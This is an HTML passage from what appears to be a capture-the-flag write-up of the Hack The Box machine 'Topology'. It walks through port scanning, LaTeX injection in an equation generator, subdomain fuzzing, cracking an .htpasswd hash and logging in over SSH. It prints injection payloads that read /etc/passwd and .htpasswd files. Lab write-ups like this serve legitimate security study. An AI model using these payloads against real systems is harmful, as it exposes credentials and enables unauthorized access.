href="/static/0f06cac562dee6075a6463df8e3c79e6/d7de0/nmap-scan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 46.835443037974684%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAByUlEQVR42lVSWXKjMBTkKLEdzI7ZJEBslrEJMfY4iT/m/ifpaZGZqcpH11Np6devW5ZXnBG0X/CbD7hiRHO6Q89PDNMXqv6KspvhJw3cuIYbGSh4hwZ7rrdeiZ3/E5bqb2iOCzp9Q0eyop6ghhvqfoFo3pCVF6RE1V0RJC28WLGyQSCx2afYugWJ5X9yqx8/SHjHMH5CT0+0+hem5Tf68YEw7ZEIjVRqRGmHnZNj5wqi4LqA7WawnQS2L2FT+Uoo1BsMqeaIRl2YDijbd5j9pCCZOOHAmlWXtUZZj0PeI6BSnzaEVG0U+0n3TeiEaiVoOKbqFtQGHLdsZq6vUFRvLKjameczBJua5nk1YeOYUWts7JSIsaUFVk5//pG1w50PqPj8ydHv677xTg0LlPG0NgEdkcgzDgzw1a+/bXBS7OjjzhOwpJrXkTsq6fWD4RCnx+ppw8CEeoe+PKn2hqKa4UQtXvZixdYp8fJ6YDACG1eu4VDhGYLyM8k0i5GejX/9O5FgYihnmClyOUGSPOW9ID0iyjXrgJA+RsZnOSKgv5ZRYXyLzKVkWB/HmabxvJTrFRmbmHOzF5umJN2HDeyAYOJ7X8CJzd9U+AN6iCi0VlmUjwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap scan" title="" src="/static/0f06cac562dee6075a6463df8e3c79e6/50637/nmap-scan.png" srcset="/static/0f06cac562dee6075a6463df8e3c79e6/dda05/nmap-scan.png 158w, /static/0f06cac562dee6075a6463df8e3c79e6/679a3/nmap-scan.png 315w, /static/0f06cac562dee6075a6463df8e3c79e6/50637/nmap-scan.png 630w, /static/0f06cac562dee6075a6463df8e3c79e6/d7de0/nmap-scan.png 705w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Open ports:</p> <ul> <li>22 (SSH)</li> <li>80 (HTTP)</li> </ul> <p>Since port 80 was open, I visited the webpage which brought up the following home page:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/0b93e50906846c157ac9d0181c19d7b9/7061d/visit-webpage.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 108.86075949367088%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAYAAADAQbwGAAAACXBIWXMAAAsTAAALEwEAmpwYAAACOUlEQVR42o2VW2vbQBCF8+/7D/peqB9DH4Lt4hQHG0qhpRSXPPjFxsZ3W5KvkiXfJvttOUWQKPbCsFpp9syZM7Oru/V6bdhqtbIkSazT6Vir1bLFYuHXm83GttutxXHsfVgfj0c7nU52Pp8tyzL/Xjh3AmNTt9u1arVqjUbD6vW6BUFgURTZZDKx6XTqbT6fWxiG/ttut/PgrwAxIrfbbatUKlar1fw8HA49UwL1ej0bj8c+gAB5hqEwXgESvVwuW6lUsmazaRv3PgwjB/SPIeDKaLlceoPlm4A4pWn6nxGOrKMwcFrGdrmY140U0U6jMGUVBRBZvN/b/ccP9ufHk213iQ8m3TQIUgiIHnsHok2H48keqzV7/vvsq4xmFO9wODjGl+uAgHlmbnPm5pPb83D/xX7//GV7t0YzdYRYXmUonY6wcBu+fv5k3x+/WeKCqSj5cRUQHVWgNM1s4Xpw6dqE90ihVG8GBIgWwjF1rAIHBjOlivEdQ6J3AWEBKEzEdjab2XAwsNFo5BtbmzVToEJARNcpYIYFzzS1/MSQZwK+24dEIwU2MUgJQM4yM6kzY3QCvjdVmZQZKkSeGWuBcWKuMsRBrQFDUueSQD+YoiVrZr5RxMKzjOFEIdCT96THTYOOuhCkM/6FDDFtwIFjRoqsYSN2qjazLttCwLyp72ALw36/72+hgWshUsZgXdg2RYBUFlAKhFEITovmwiq/ZaSEXrpcAdavQF1xM8O8rtIMXVW8fCHzVX4BTfyIT4mNoPIAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="visit webpage" title="" src="/static/0b93e50906846c157ac9d0181c19d7b9/50637/visit-webpage.png" srcset="/static/0b93e50906846c157ac9d0181c19d7b9/dda05/visit-webpage.png 158w, /static/0b93e50906846c157ac9d0181c19d7b9/679a3/visit-webpage.png 315w, /static/0b93e50906846c157ac9d0181c19d7b9/50637/visit-webpage.png 630w, /static/0b93e50906846c157ac9d0181c19d7b9/fddb0/visit-webpage.png 945w, /static/0b93e50906846c157ac9d0181c19d7b9/f46b1/visit-webpage.png 1260w, /static/0b93e50906846c157ac9d0181c19d7b9/7061d/visit-webpage.png 1420w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>A link on the page leads to <code class="language-text">latex.topology.htb</code>, so I added that to <code class="language-text">/etc/hosts</code>. It's an image generator that creates a PNG based on LaTeX inline math mode syntax commands as input:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/66d4ebf05c86ea6ea83bd2298b255a00/7061d/latex-equation-generator.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 60.75949367088608%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABL0lEQVR42pWTaW6DMBCFc/+L9CC9QX9XTdgShc1gbGO88OoxBaltEoGlkW2k+Xgzb3zCnzXPM/KiQJbl+DqfcUkSXK/XZb/d4L3Hq3X692UGnHNbaK0xDAOEEBjHMf7wGBC/gcYYTNMUz6TuNe4BkBQ0TYP7vURZVjGqqkbPOcTAYRRH3/Ww1u4D+gCsmxZ1XYOxDkqNMfQokTcK758KHVeYvdsJ9ARkaFkbSjVR8dq2pAPePgBptnbvAXoUweU0zcCDGWSElPLHFAlvFYQUsbe7TalCuSJAKInO5DQpNdahYX006JnbD4EqqFqTxgBb1VA72rYNd3tsbISQwQgVgVovJZOrdE/TNCo+BCQVNMykkvpIwFhyUJrnxXEgjQklLwo1rHPbM2KMgYeZfAb8BsgWrrYvNXmuAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="latex equation generator" title="" src="/static/66d4ebf05c86ea6ea83bd2298b255a00/50637/latex-equation-generator.png" srcset="/static/66d4ebf05c86ea6ea83bd2298b255a00/dda05/latex-equation-generator.png 158w, /static/66d4ebf05c86ea6ea83bd2298b255a00/679a3/latex-equation-generator.png 315w, /static/66d4ebf05c86ea6ea83bd2298b255a00/50637/latex-equation-generator.png 630w, /static/66d4ebf05c86ea6ea83bd2298b255a00/fddb0/latex-equation-generator.png 945w, /static/66d4ebf05c86ea6ea83bd2298b255a00/f46b1/latex-equation-generator.png 1260w, /static/66d4ebf05c86ea6ea83bd2298b255a00/7061d/latex-equation-generator.png 1420w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I started testing some payloads from <a href="https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection#latex-injection" target="_blank">HackTricks</a> to try and get LFI. The following command outputted "Illegal command detected. Sorry."</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">\input{/etc/passwd}</code></pre></div> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/0d2798e10be61ded0be06f360399d675/d5403/illegal-command.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 18.9873417721519%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAr0lEQVR42m1PWwqEMBDzCGq1BVFBe4uCBxA8i19C1foA7Ye3jszAui7sR5gmk6ZpUNc1iqJAHMcPoij64f92YRhCCMEzyzJQTlVVCMqyhDEG1lo457DvO7z3mOcZ67qytiwLT8K2bYzzPPnOdV3ouo5DtdYIqF3TNGzu+56DKJTM4zhiGAbWCMSnaWIvPUq74zjQtu03kKpSS6UUQ0qJNE0f/tHe57cnSRLkef58+QaFvIsMccgH+QAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="illegal command detected" title="" src="/static/0d2798e10be61ded0be06f360399d675/50637/illegal-command.png" srcset="/static/0d2798e10be61ded0be06f360399d675/dda05/illegal-command.png 158w, /static/0d2798e10be61ded0be06f360399d675/679a3/illegal-command.png 315w, /static/0d2798e10be61ded0be06f360399d675/50637/illegal-command.png 630w, /static/0d2798e10be61ded0be06f360399d675/d5403/illegal-command.png 739w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, I tried the <code class="language-text">\lstinputlisting</code> command:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">\lstinputlisting{/etc/passwd}</code></pre></div> <p>This outputted an error message, but didn't mention anything about the command being illegal:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d8a097770fe716f300a122c9c3735170/9f2f1/lstinutlisting-error.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 7.59493670886076%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAcklEQVR42iWMSw7FIAwDexoW5ZdygxIIAe5/Hr+Ut7A0kse+eu9Ya+F9Kz7WOTHGQJeOvTdqZYgIhqpxheq0DEhv4NbQmMHcILZRc64QImKMoOdBzhnBOKVknEBEcM5Zn07nvT9eKeVssnmfe9/3/4MIP+fWQvEghHVfAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="lstinutlisting error" title="" src="/static/d8a097770fe716f300a122c9c3735170/50637/lstinutlisting-error.png" srcset="/static/d8a097770fe716f300a122c9c3735170/dda05/lstinutlisting-error.png 158w, /static/d8a097770fe716f300a122c9c3735170/679a3/lstinutlisting-error.png 315w, /static/d8a097770fe716f300a122c9c3735170/50637/lstinutlisting-error.png 630w, /static/d8a097770fe716f300a122c9c3735170/9f2f1/lstinutlisting-error.png 731w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After some trial and error, eventually I found that wrapping the command in <code class="language-text">$</code> displayed the <code class="language-text">/etc/passwd</code> file:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">$\lstinputlisting{/etc/passwd}$</code></pre></div> <p><code class="language-text">/etc/passwd</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/05f6c07057da6088f5074081097dc024/44c02/etc-passwd.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 88.60759493670886%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAABt0lEQVR42n2UWQ7CMAxEc/9rlbJvZd93zhH0LL2qIOBjlDiQ8YztNI3H4zyfz/N0Og1UVZVHo1FeLpd5t9vl7XabD4dDvt/vgdvtVuMzBmkymQTRYDDIkAP2nU4nyC6XS+Db5W9I3W43SCDo9/uZuCzLICUZajebzV91zX3CItDucDis7UNKjOVPJT8JUeBlVtRCwjkgRunxeMyPx+OvXYgT9iDo9Xq51WoFcdM256o+nU5RT4ht0mcp0mw2q5WpiloSc65a6rharaLzkKIYnM/nN+UJBU2b7XY79gBi7LryP8ZpsVjUK0kgrgmLogh7WmOl4xADbPM7ZYDAxpGcvcQojRpqVQX+Gbuc6UBrzdr9HWwuogJF1BUr1hAlnDHov7orecKeVlFGzF7QeZ4mCu0yF3+NULLgkDomnJnAF+Pgo9R37pMUJEkWV1JscwHLDrYfDIq/Xq9DKa/HsSEWqTnMgBhIQocpA3BGSUwZSArJfr8PxSDmEBvasp522zI4bwB1kLBCeL1ew+6bZayZnTO7Kyl2SQo4Rw2EdB7Suss2hUt+XbDO6mXIcOHo+OFF7fP5fPvavACGUenrl0CfxgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="view /etc/passwd" title="" src="/static/05f6c07057da6088f5074081097dc024/50637/etc-passwd.png" srcset="/static/05f6c07057da6088f5074081097dc024/dda05/etc-passwd.png 158w, /static/05f6c07057da6088f5074081097dc024/679a3/etc-passwd.png 315w, /static/05f6c07057da6088f5074081097dc024/50637/etc-passwd.png 630w, /static/05f6c07057da6088f5074081097dc024/44c02/etc-passwd.png 847w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Viewing <code class="language-text">/etc/passwd</code> showed a user on the system, <code class="language-text">vdaisley</code>. I tried viewing some other files on the server and found that it's an Apache server by viewing <code class="language-text">/etc/apache2/apache2.conf</code>, but other than that, I didn't find anything too useful up to this point.</p> <p>Next, I used <code class="language-text">ffuf</code> to enumerate subdomains:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/cf716359641bddb0f4114884e072c722/6106f/ffuf.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 82.91139240506328%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAAC3ElEQVR42o1UyXLaUBDUr2AWLYBWJCG0CyQwmwsbx0lOySH//wmdnieokBxcOUw9zUPMdPf0SNPTVxj5B4L6iu78Ddfvv/DGeHn/yfiB9viBMNshyp+xqk9IqgPS5oRFusWy3GNZyG9bpPUBpptCM7wcTljCjxsESQuf4S430J0Mo+kShp3C4LOEyXdNN4flFcxTlVtepgpN/QyTeQxtaEZMSkyDCjOG/GHMQuP5CnZYw2I+MEI88b2BhNHHPX+ybmGGGPLUhvoCM3Zxwwp2QKTLdY8yXrNgo4oOrfjzmP4JbTAJoM+WmBK2Po1gErZlJ0SWKWqmQhj9d1FtRKhzUhaE5jzBcOLhaexgZC4wmiUYs9mYp+j5KbpbrgUcgLuoiC7GhBdS3Is2qrhF1JYSPodO1Hft/o3Bw7NW1Gcssz1MW6jFHEyDpDjCW5SI0w1WtEWSd/Cjis3EEQ3cqNfXIxgJ0VxynY7QkvyEvLmg3l5pmy0142BIf8yJjW5UR0Qv0ox0HyPDpwQrJcNk3p/3kHe1KN2jat8w9SoM9Bj2olEF/6Yntol7etT3iYXvucSjplqc0fn1C7236gsGNaJkrezixq2iF6w6Pm/gRP29Q83lFJpyP3gorNk+zevQ2J5sS4uZ5DZN7aXUs1TWcblFYh/Zln5LMlVwzhDdZGgTu6evrbt3RVmQNrsviDggeU64v26QczgF8nqPMGk4pBZl+8L93d/2+qgaJOVBLYI00rzFhi/vaJWW5i5hOoXSU4ajz4jIITJ2t2R3aR1jGsKg+YcypJs3Hz2q5dQvLc+0RYd2/xULFnfCtbKOyyYzFq+6N6WVn3R0xBkeqa63FzJ6xZx6Fu2FOm+VLFpLmk13VUW7/Td1rhjF+oIofVYNmt07VtVJUWsPH7zvkDVH5OuzKpiyiXzOTFcoE01I/wltNSC7wJyoLBrdUJQLTOg7GZopQyEKnbl8A+6TfbTPby1nJkFakzjHAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ffuf" title="" src="/static/cf716359641bddb0f4114884e072c722/50637/ffuf.png" srcset="/static/cf716359641bddb0f4114884e072c722/dda05/ffuf.png 158w, /static/cf716359641bddb0f4114884e072c722/679a3/ffuf.png 315w, /static/cf716359641bddb0f4114884e072c722/50637/ffuf.png 630w, /static/cf716359641bddb0f4114884e072c722/6106f/ffuf.png 708w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Two subdomains were found: <code class="language-text">dev</code> and <code class="language-text">stats</code>, so I added both to <code class="language-text">/etc/hosts</code>. <code class="language-text">stats.topology.htb</code> contained a couple graphs that plotted network and server data. <code class="language-text">dev.topology.htb</code> required a username and password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 498px; " > <a class="gatsby-resp-image-link" href="/static/236aeff45f0730ff2e12d4aeb0acbe79/880ea/dev-sign-in.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 61.39240506329114%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABdklEQVR42p2Tu1LCQBSGt7Swt1O5jSMCo44ouQAJmxsEyIUEEhwYdKxtbK0t7BxfwMbKR7Cw9g18BN/i92wcawPFNzk7s/+3J2d22WiUIE1vEE2WiKMVktk1pvEKBvega0P09FFuxH42dGeZYBIuMmkyu0LgX8IyffDeOGMdKbPMAN54DiH2vTnCYJHJhVQcNKY/0DWXNg9zQMK+PUFIgjBcwnEiGIYPkw7h3M/qdeBC2HETyNSdROLjjouabKOuOGtTIyRrAnZqBCicqNirNlGst1BqSBtRoOyZFYFxshrDFAZ1qven0Jx4Y3QaExvQ3GIxQy8Fp+F3FAtd1d6IHuVZq9VDoVBFqXiEcrmei4qg0vj9lmqoULa0fwhFNsG0rkuFlS1kKR/SBcd5U6eaQ6as3B5AVmzo5GLi7vxd4P8Qr0eloKoYGPQDEnex8/qB7fcvbH1+o3H3ALbO8xLSTrtPQovqERTq8OD+CfuPL9h9fkNzeYsfN+Osf4wsW8YAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="dev sign in" title="" src="/static/236aeff45f0730ff2e12d4aeb0acbe79/880ea/dev-sign-in.png" srcset="/static/236aeff45f0730ff2e12d4aeb0acbe79/dda05/dev-sign-in.png 158w, /static/236aeff45f0730ff2e12d4aeb0acbe79/679a3/dev-sign-in.png 315w, /static/236aeff45f0730ff2e12d4aeb0acbe79/880ea/dev-sign-in.png 498w" sizes="(max-width: 498px) 100vw, 498px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>However, knowing that there was a <code class="language-text">dev</code> subdomain, I could use that to try and find a <code class="language-text">.htpasswd</code> file which is the conventional place to find password hashes for authentication on an Apache server.</p> <p>A typical Linux file structure for web subdomains looks something like this:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">/var/www/ └── html/ ├── index.html ... └── subdomain/ ├── index.html └── .htpasswd ...</code></pre></div> <p>The following command revealed the password hash for <code class="language-text">vdaisley</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">$\lstinputlisting{/var/www/dev/.htpasswd}$</code></pre></div> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/8c13a2a5775d2fb6b5d40b6ff465ed7b/47d67/htpasswd.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 10.126582278481013%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAaUlEQVR42j2LOQoAIRAE938Ghkb+RPEMxFsw8bW9OLAbNFT31DxSSpxzsNbC3htzTkqtFTln9N7RWqP+8b2nlKiPMci7v5xzPEIIGkIIJBljKN57WGsRYyR2ztF+vctKqZ+11iilgDGGF3rXZVPKVgqIAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt=".htpasswd" title="" src="/static/8c13a2a5775d2fb6b5d40b6ff465ed7b/50637/htpasswd.png" srcset="/static/8c13a2a5775d2fb6b5d40b6ff465ed7b/dda05/htpasswd.png 158w, /static/8c13a2a5775d2fb6b5d40b6ff465ed7b/679a3/htpasswd.png 315w, /static/8c13a2a5775d2fb6b5d40b6ff465ed7b/50637/htpasswd.png 630w, /static/8c13a2a5775d2fb6b5d40b6ff465ed7b/fddb0/htpasswd.png 945w, /static/8c13a2a5775d2fb6b5d40b6ff465ed7b/47d67/htpasswd.png 1220w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I used <code class="language-text">JtR</code> to crack the hash:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/771fbc575819f20556e70dda348982ce/24e04/cracked-hash.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 33.54430379746836%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsSAAALEgHS3X78AAABYElEQVR42mWQ2W6DMBBF+ZWGhCVsBoMNxKxJSEt2RW0e+/9fcTt2VKlSH47Gtuwzd2y54o5s+IbcPlH2Z/TzF/FEP10xzA8U4xlO1sLPe7hUPd6Z6qYN3KjGKqwMjl4HJSypTmD5DmVDVeyRiB1iIhFbsKJFnLdI5GhI6z1YRXfKHVKqvJ4Q5YO5y6sJXrKB1QxXcHlA1Z5R9xdshgua8Wb2eXVAEFUIkxpxqsB4gyRTiDWUNClGMEmNSRgXAxa+gKW6I1R3Qkuyov5ARnKhZkNGQqmTF1tEfMCatVQ7BNQgZAQ1iegrAn2WtljqkR1+wiq/YZXRY3XEOH2i6ihpr5PeabQD3hyBhSdge6+68CWdZS9cbpJp7LWElaoLYvmOvDli2D8gNzPWMX1+qOBFCk5Qk6iE7f8isaSHthZ4Oa1fol8sTuOkNA4jItaRrKGROiPVyWyXBN5L9A8S/pVp4Q91d+O/+duXLwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="cracked hash" title="" src="/static/771fbc575819f20556e70dda348982ce/50637/cracked-hash.png" srcset="/static/771fbc575819f20556e70dda348982ce/dda05/cracked-hash.png 158w, /static/771fbc575819f20556e70dda348982ce/679a3/cracked-hash.png 315w, /static/771fbc575819f20556e70dda348982ce/50637/cracked-hash.png 630w, /static/771fbc575819f20556e70dda348982ce/24e04/cracked-hash.png 712w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">dev.topology.htb</code> was just a simple landing page and didn't contain anything useful. But, I used the credentials for <code class="language-text">vdaisley</code> to SSH into the machine:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/99bfc79fd9c8dd7b5616cd033de17807/1bed9/ssh-login.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 76.58227848101265%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsSAAALEgHS3X78AAACsklEQVR42l1UWXLiQBTjJhl27/tut1c2kwChmEzVfM39T6FRNyEp8qFy48R6epLsydJvsYhPMPIbzOwNSXXAsHtHuzmh7l6RVXuU/RlLu8BUizHTk6/rA3Mj/cIkEUcU3Rn1cEZD1P0JZXNUqJoRQSRgeiU0t4LuC1hhq6B7Fcyg5lU8E1q8YfMPmlPyQYG1lUG3c6zNFBrPplvAIOSDhl+TrIETdzA8oc6S+InQiTr4cQ8nEHBJ7HK6G/Xwky3skPejAY5fwfJyguRODp0DvKTnAIFf6/iHQt4M0w2JeirtSTbAT7dw4wFhfoAXtVRLz7SIfkWYayEWWoD5ysNc/jazHx4WBxr/ily8oWwvCNId8voNcXlEWh0RpR1iBiWRVCMSMcLmkCDtoZscsg6fSCemV9MjiYa+tEQD05dola8rI6L5jfLw7qPAQhJIyJSV0u+1Jz79CuMN/OgOpaoYlUJPrh03/L1DVI60YAf307vnunyfJwYDcbmKXR5gFns4+Z7rbBkGV6Jyzcqh0UPp9Zrpzx9ED5U8Lz5x97A7IWZxDU43SGhnRNCxGoOyQp7XZo4VwzCdDEsGMls4hI3Z0mVYMX7pGab6nXwimjPa7qLWLgXJmawddijasyJstzc0hLSh3Vxhpge8uD2mPmEVWBs+XNuD60ZKpUpZpiq7J5MWJI9IWvdXdm1LL0dFHmQ7FPy/qObQzQfC4Te0dMSK1fFI6Nj+XWHZSFV7vhGChK/Y7P+gYn3azU1dh/0HRP+uhshhTnKEVf/DyuYrx8rMtAQvq+hecPo7yZhqQhUm18tIWFFNwoc7rin7WdISSfwgjKsTkv4vrHiLKUkWBr1j6R9hTfyOX5jxhnB/RXykV/0FKf1qhiu/Nhem2zAUfhyskq8de8hNTJf9VD1M76DKRxf/Azsr53ucZCrfAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ssh login" title="" src="/static/99bfc79fd9c8dd7b5616cd033de17807/50637/ssh-login.png" srcset="/static/99bfc79fd9c8dd7b5616cd033de17807/dda05/ssh-login.png 158w, /static/99bfc79fd9c8dd7b5616cd033de17807/679a3/ssh-login.png 315w, /static/99bfc79fd9c8dd7b5616cd033de17807/50637/ssh-login.png 630w, /static/99bfc79fd9c8dd7b5616cd033de17807/1bed9/ssh-login.png 640w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>At this point, I was looking for potential paths for privilege escalation, so I used pspy to monitor processes that could be exploitable:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/a3a465944a310b40c4b5a61b05cd39ba/0df09/run-pspy.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 70.25316455696203%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACqUlEQVR42n1UW2sTURDOHxFpsslms5dc9pK9bzb3mDabGkF8F3wRfFIRsYrSi9W2Fg2t4OVJX4ogUhDB//Y5Z7alUsSHj5k9nPlmvjMzW2ikq2iv3kBjmMEcztDoLOAkM8T9GZxwgiCdIeiuMdLxAiFZtRWiVLNRVh1Il1AIuzP0Rgukg3VEFNwZZIgHc3SG6/DTNUbUz+BEYyJpo6Q4KCoWB59bqeZwAia0/D6sYADD6cKOJjDsLgyrC93qQLdTaGaCWjOi8xSyERCJg4ruUXVt1BoBylqbUdHdnLBpJ9DrHkqSAZlltNFy+4QBk9UpUZO+G+0eW5HQ9Ifs22Rlw2NizYxyQtUbQI9GUKlSzYmgmBTojWF6fVTrEVU/glIPUW2EbNWWqDgmG6NYtbEiWyiRFbIFCsYog7Z6HY3rN2FM56j4C7TCjN5wDpuaIioR8jUiUpkooWo6TKiTAt2MqcLwgrBK71KuuZA1n7LZJKnDj682E34vSXWZQMgXZDr5nODsWxAr9eCCsFi1sHOwxMs3S2xs7uHB021s7S/x6csJnR3h8fNdkj3EFanFCVaEzEsoKn9JVgwfJ99PsTz+gJ1XB3i29Ro/fv7G+89f8WRzH99Of7E0ESiqLVHTJEJu3dwX43QhOcaL3Xc8ew83tnHw9gh7h8eIezPcufcIh0cf+fHzoP/BYRRkPYQbTmmOfNjBmEfBi8fcvdt372OS3cJV2aTL7r+JlEuE5ZrHzZAooFh1IOsBViot3gjRgLImZLpkvVxy7VxqfpbDze8JQieYIOplcOMp2Tn8zgxeco13Nuqvw02mDLGiYg3FvTZtlJfQP4B8vzMlf5o